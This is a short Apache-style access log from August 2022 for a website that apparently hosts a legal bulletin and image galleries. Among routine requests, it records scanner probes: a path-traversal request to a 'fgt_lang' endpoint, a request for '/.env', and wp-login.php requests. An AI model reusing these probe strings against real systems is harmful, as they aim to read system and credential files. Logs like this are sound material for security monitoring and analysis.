172.22.2.4 - - [13/Aug/2022:18:16:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57716
192.241.222.136 - - [13/Aug/2022:18:18:56 -0500] "MGLNDD_190.27.245.106_80" 501 953
185.119.81.105 - - [13/Aug/2022:18:19:32 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [13/Aug/2022:18:19:33 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [13/Aug/2022:18:20:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47396
201.245.192.253 - - [13/Aug/2022:18:20:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48645
172.22.2.4 - - [13/Aug/2022:18:20:46 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3277&usuario=&sector=&fecha=2022&resuelve= HTTP/1.1" 200 1075
173.252.95.119 - - [13/Aug/2022:18:20:46 -0500] "GET /images/pieza-grafica-semana-ambiental-30.jpg HTTP/1.1" 200 38850
201.245.192.253 - - [13/Aug/2022:18:21:24 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
157.55.39.50 - - [13/Aug/2022:18:22:15 -0500] "GET /images/cronica-mujer-31-enero.jpg HTTP/1.1" 200 29531
216.245.221.92 - - [13/Aug/2022:18:22:23 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:18:21:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:18:23:46 -0500] "GET /BLA/boletinlegal/remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 1018
172.22.2.4 - - [13/Aug/2022:18:22:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
172.22.2.4 - - [13/Aug/2022:18:24:38 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%209%20del%2003%20de%20Noviembre%20de%202011.pdf HTTP/1.1" 200 54568
66.249.66.13 - - [13/Aug/2022:18:24:47 -0500] "-" 408 -
23.100.232.233 - - [13/Aug/2022:18:24:54 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
23.100.232.233 - - [13/Aug/2022:18:24:54 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
23.100.232.233 - - [13/Aug/2022:18:24:55 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [13/Aug/2022:18:26:23 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
216.245.221.92 - - [13/Aug/2022:18:27:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:18:27:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
109.237.103.123 - - [13/Aug/2022:18:29:16 -0500] "GET /.env HTTP/1.1" 404 1018
109.237.103.123 - - [13/Aug/2022:18:29:16 -0500] "\x16\x03\x01\x01D\x01" 400 226
172.22.2.4 - - [13/Aug/2022:18:27:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56005
201.245.192.253 - - [13/Aug/2022:18:30:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47396
201.245.192.253 - - [13/Aug/2022:18:30:34 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 48645
201.245.192.253 - - [13/Aug/2022:18:31:22 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 46805
172.22.2.4 - - [13/Aug/2022:18:31:48 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [13/Aug/2022:18:31:55 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [13/Aug/2022:18:31:55 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [13/Aug/2022:18:31:55 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [13/Aug/2022:18:32:04 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [13/Aug/2022:18:32:04 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
190.157.242.76 - - [13/Aug/2022:18:32:06 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.157.242.76 - - [13/Aug/2022:18:32:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 391860
216.245.221.92 - - [13/Aug/2022:18:32:24 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/Aug/2022:18:31:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60865
